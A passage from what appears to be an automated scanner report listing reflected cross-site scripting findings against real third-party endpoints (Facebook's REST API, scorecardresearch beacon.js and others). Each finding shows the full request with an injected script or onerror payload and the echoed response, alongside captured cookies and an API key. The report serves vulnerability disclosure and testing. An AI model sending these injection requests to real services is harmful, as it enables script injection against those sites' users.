Host: api.echoenabled.com
Proxy-Connection: keep-alive
Referer: http://aboutecho.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Server: Yaws/1.85 Yet Another Web Server
Date: Mon, 14 Feb 2011 14:34:44 GMT
Content-Length: 139
Content-Type: application/x-javascript; charset="utf-8"

jsonp1297694123476({ "result": "error", "errorCode": "wrong_query", "errorMessage": "Parse error near: \"befc2<a>168ce8e9d57\" at 424" });

1.81. http://api.facebook.com/restserver.php [method parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The value of the method request parameter is copied into a JSON string value inside the JSONP response (Content-Type: text/javascript). The payload 51f5d<img%20src%3da%20onerror%3dalert(1)>50bd65752c8 was submitted in the method parameter. This input was echoed as 51f5d<img src=a onerror=alert(1)>50bd65752c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. Because the response is a text/javascript JSONP body rather than an HTML document, the <img onerror> only fires if a browser renders that body as HTML; a JSON encoder that escapes < and > as \u003c and \u003e, together with X-Content-Type-Options: nosniff, removes that possibility.

Request

GET /restserver.php?v=1.0&method=links.getStats51f5d<img%20src%3da%20onerror%3dalert(1)>50bd65752c8&urls=%5B%22http%3A%2F%2Fwww.legacy.com%2Flegacies%2F2011%2Fobituary-photo-gallery.aspx%3Fphoto%3Dbetty-garrette96f0%2522style%253d%2522x%253aexpression(alert(1))%2522520eb12a7af%26pid%3D148615818%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/legacies/2011/obituary-photo-gallery.aspx?photo=betty-garrette96f0%22style%3d%22x%3aexpression(alert(1))%22520eb12a7af&pid=148615818
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dexaminer.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.examiner.com%252Fnational%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: text/javascript;charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Cnection: close
Date: Mon, 14 Feb 2011 01:29:50 GMT
Content-Length: 466

fb_sharepro_render({"error_code":3,"error_msg":"Unknown method","request_args":[{"key":"v","value":"1.0"},{"key":"method","value":"links.getStats51f5d<img src=a onerror=alert(1)>50bd65752c8"},{"key":"urls","value":"[\"http:\/\/www.legacy.com\/legacies\/2011\/obituary-photo-gallery.aspx?photo=betty-garrette96f0%22style%3d%22x%3aexpression(alert(1))%22520eb12a7af&pid=148615818\"]"},{"key":
...[SNIP]...

1.82. http://api.facebook.com/restserver.php [method parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The value of the method request parameter is copied into a JSON string value in the response (Content-Type: application/json). The payload 1ca06<img%20src%3da%20onerror%3dalert(1)>7fc4ebab431e57952 was submitted in the method parameter. This input was echoed as 1ca06<img src=a onerror=alert(1)>7fc4ebab431e57952 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method; it was possible to convert it to a GET request, which makes the attack easier to demonstrate and deliver.

Request

GET /restserver.php?method=fql.query&query=SELECT%20name%2Cpic_small%2Cuid%20from%20user%20WHERE%20uid%20IN%20(1292387673)&method=fql.query1ca06<img%20src%3da%20onerror%3dalert(1)>7fc4ebab431e57952&api_key=54cc5dbde0acea15cbf544d4e434acc0&format=JSON&call_id=599&v=1.0 HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/Y7YCBKX-HZn.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dexaminer.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.examiner.com%252Fnational%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: application/json
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Cnection: close
Date: Mon, 14 Feb 2011 01:38:38 GMT
Content-Length: 388

{"error_code":3,"error_msg":"Unknown method","request_args":[{"key":"method","value":"fql.query1ca06<img src=a onerror=alert(1)>7fc4ebab431e57952"},{"key":"query","value":"SELECT name,pic_small,uid from user WHERE uid IN (1292387673)"},{"key":"api_key","value":"54cc5dbde0acea15cbf544d4e434acc0"},{"key":"format","value":"JSON"},{"key":"call_id",
...[SNIP]...

1.83. http://api.facebook.com/restserver.php [query parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The value of the query request parameter is copied into a JSON string value in the response (Content-Type: application/json). The payload d807b<img%20src%3da%20onerror%3dalert(1)>86106d539e46377d1 was submitted in the query parameter. This input was echoed as d807b<img src=a onerror=alert(1)>86106d539e46377d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method; it was possible to convert it to a GET request, which makes the attack easier to demonstrate and deliver.

Request

GET /restserver.php?method=fql.query&query=SELECT%20name%2Cpic_small%2Cuid%20from%20user%20WHERE%20uid%20IN%20(1292387673)d807b<img%20src%3da%20onerror%3dalert(1)>86106d539e46377d1&method=fql.query&api_key=54cc5dbde0acea15cbf544d4e434acc0&format=JSON&call_id=599&v=1.0 HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/Y7YCBKX-HZn.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dexaminer.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.examiner.com%252Fnational%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=60
Content-Type: application/json
Expires: Sun, 13 Feb 2011 17:39:13 -0800
Pragma:
X-Cnection: close
Date: Mon, 14 Feb 2011 01:38:13 GMT
Content-Length: 424

{"error_code":601,"error_msg":"Parser error: unexpected 'd807b' at position 61.","request_args":[{"key":"method","value":"fql.query"},{"key":"query","value":"SELECT name,pic_small,uid from user WHERE uid IN (1292387673)d807b<img src=a onerror=alert(1)>86106d539e46377d1"},{"key":"api_key","value":"54cc5dbde0acea15cbf544d4e434acc0"},{"key":"format","value":"JSON"},{"key":"call_id","value":"599"},{"key":"v","value":"1.0"}]}

1.84. http://api.facebook.com/restserver.php [urls parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The value of the urls request parameter is copied into the HTML document as plain text between tags. The payload ec7bd<img%20src%3da%20onerror%3dalert(1)>a0b94148a55 was submitted in the urls parameter. This input was echoed as ec7bd<img src=a onerror=alert(1)>a0b94148a55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.legacy.com%2Flegacies%2F2011%2Fobituary-photo-gallery.aspx%3Fphoto%3Dbetty-garrette96f0%2522style%253d%2522x%253aexpression(alert(1))%2522520eb12a7af%26pid%3D148615818%22%5Dec7bd<img%20src%3da%20onerror%3dalert(1)>a0b94148a55&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/legacies/2011/obituary-photo-gallery.aspx?photo=betty-garrette96f0%22style%3d%22x%3aexpression(alert(1))%22520eb12a7af&pid=148615818
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dexaminer.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.examiner.com%252Fnational%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Sun, 13 Feb 2011 17:32:01 -0800
Pragma:
X-Cnection: close
Date: Mon, 14 Feb 2011 01:30:01 GMT
Content-Length: 482

fb_sharepro_render({"error_code":114,"error_msg":"param urls must be an array.","request_args":[{"key":"v","value":"1.0"},{"key":"method","value":"links.getStats"},{"key":"urls","value":"[\"http:\/\/www.legacy.com\/legacies\/2011\/obituary-photo-gallery.aspx?photo=betty-garrette96f0%22style%3d%22x%3aexpression(alert(1))%22520eb12a7af&pid=148615818\"]ec7bd<img src=a onerror=alert(1)>a0b94148a55"},{"key":"format","value":"json"},{"key":"callback","value":"fb_sharepro_render"}]});

1.85. http://api.js-kit.com/v1/count [q parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.js-kit.com
Path:   /v1/count

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload d0e85<a>179ca1bd15e was submitted in the q parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /v1/count?q=d0e85<a>179ca1bd15e&callback=Reuters.utils.socialCallback&appkey=prod.reuters.com HTTP/1.1
Host: api.js-kit.com
Proxy-Connection: keep-alive
Referer: http://uk.reuters.com/article/2011/02/13/us-bafta-idUKTRE71C1YB20110213
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Server: Yaws/1.85 Yet Another Web Server
Date: Mon, 14 Feb 2011 01:36:03 GMT
Content-Length: 148
Content-Type: application/x-javascript; charset="utf-8"

Reuters.utils.socialCallback({ "result": "error", "errorCode": "wrong_query", "errorMessage": "Parse error near: \"d0e85<a>179ca1bd15e\" at 19" });

1.86. http://ar.voicefive.com/b/rc.pli [func parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 56ff7<script>alert(1)</script>c505676b722 was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction56ff7<script>alert(1)</script>c505676b722&n=ar_int_p85001580&1297650567782 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.8;sz=160x600;click0=http://a.tribalfusion.com/h.click/atmNvBUVn55rymoWArXTew3dYHPVjC2mMLpHEyVHbaXrfcYF7l0a6pPrJFTbv4THYWmbZbuQFZbmXTQt5TUk4Ev3oTBIYUJ8WHbXmAQCmV7tmWrJ3TUl5teo5mBZbnFbZaXsbQXs3Y1c7npEbP3br5Wr7DVAMTRHvguWoXW8/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SDYN_2011Q1/160/L41/446634589/x90/USNetwork/RS_SDYN_2011Q1_TF_PR_DEF_160/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/160/L44/1473307965/x90/USNetwork/RS_SELL_2011Q1_TF_CT_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1473307965?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; ar_s_p84053757=1->1297606675; ar_p84053757=exp=6&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:38:09 2011&prad=1160020&arc=1422863&; ar_p85001580=exp=53&initExp=Wed Jan 26 20:14:29 2011&recExp=Mon Feb 14 02:28:38 2011&prad=58087461&arc=40400763&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1297650518%2E886%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 14 Feb 2011 02:28:49 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteraction56ff7<script>alert(1)</script>c505676b722("");

1.87. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload a8148<script>alert(1)</script>634abd05f4d was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3a8148<script>alert(1)</script>634abd05f4d&c2=6035338&c3=%EBuy!&c4=%ECid!&c5=57892644&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:36 GMT
Date: Mon, 14 Feb 2011 01:26:36 GMT
Connection: close
Content-Length: 3596

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3a8148<script>alert(1)</script>634abd05f4d", c2:"6035338", c3:".uy!", c4:".id!", c5:"57892644", c6:"", c10:"", c15:"", c16:"", r:""});

1.88. http://b.scorecardresearch.com/beacon.js [c10 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 1a8b2<script>alert(1)</script>16a0b4321e1 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=12414&c5=&c6=&c10=31476441a8b2<script>alert(1)</script>16a0b4321e1&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:40 GMT
Date: Mon, 14 Feb 2011 01:26:40 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"12414", c5:"", c6:"", c10:"31476441a8b2<script>alert(1)</script>16a0b4321e1", c15:"", c16:"", r:""});

1.89. http://b.scorecardresearch.com/beacon.js [c15 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 7aa03<script>alert(1)</script>33d2ba5508b was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=12414&c5=&c6=&c10=3147644&c15=7aa03<script>alert(1)</script>33d2ba5508b HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:40 GMT
Date: Mon, 14 Feb 2011 01:26:40 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"12414", c5:"", c6:"", c10:"3147644", c15:"7aa03<script>alert(1)</script>33d2ba5508b", c16:"", r:""});

1.90. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload efa2b<script>alert(1)</script>b32d71508fc was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338efa2b<script>alert(1)</script>b32d71508fc&c3=%EBuy!&c4=%ECid!&c5=57892644&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:36 GMT
Date: Mon, 14 Feb 2011 01:26:36 GMT
Connection: close
Content-Length: 3596

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
unction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338efa2b<script>alert(1)</script>b32d71508fc", c3:".uy!", c4:".id!", c5:"57892644", c6:"", c10:"", c15:"", c16:"", r:""});

1.91. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 2bc3f<script>alert(1)</script>8a89c7c3d07 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=%EBuy!2bc3f<script>alert(1)</script>8a89c7c3d07&c4=%ECid!&c5=57892644&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:36 GMT
Date: Mon, 14 Feb 2011 01:26:36 GMT
Connection: close
Content-Length: 3596

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338", c3:".uy!2bc3f<script>alert(1)</script>8a89c7c3d07", c4:".id!", c5:"57892644", c6:"", c10:"", c15:"", c16:"", r:""});

1.92. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload ecbe3<script>alert(1)</script>19cfb851d89 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=%EBuy!&c4=%ECid!ecbe3<script>alert(1)</script>19cfb851d89&c5=57892644&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:37 GMT
Date: Mon, 14 Feb 2011 01:26:37 GMT
Connection: close
Content-Length: 3596

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338", c3:".uy!", c4:".id!ecbe3<script>alert(1)</script>19cfb851d89", c5:"57892644", c6:"", c10:"", c15:"", c16:"", r:""});

1.93. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload d5698<script>alert(1)</script>41ad9abe9a7 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=%EBuy!&c4=%ECid!&c5=57892644d5698<script>alert(1)</script>41ad9abe9a7&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:37 GMT
Date: Mon, 14 Feb 2011 01:26:37 GMT
Connection: close
Content-Length: 3596

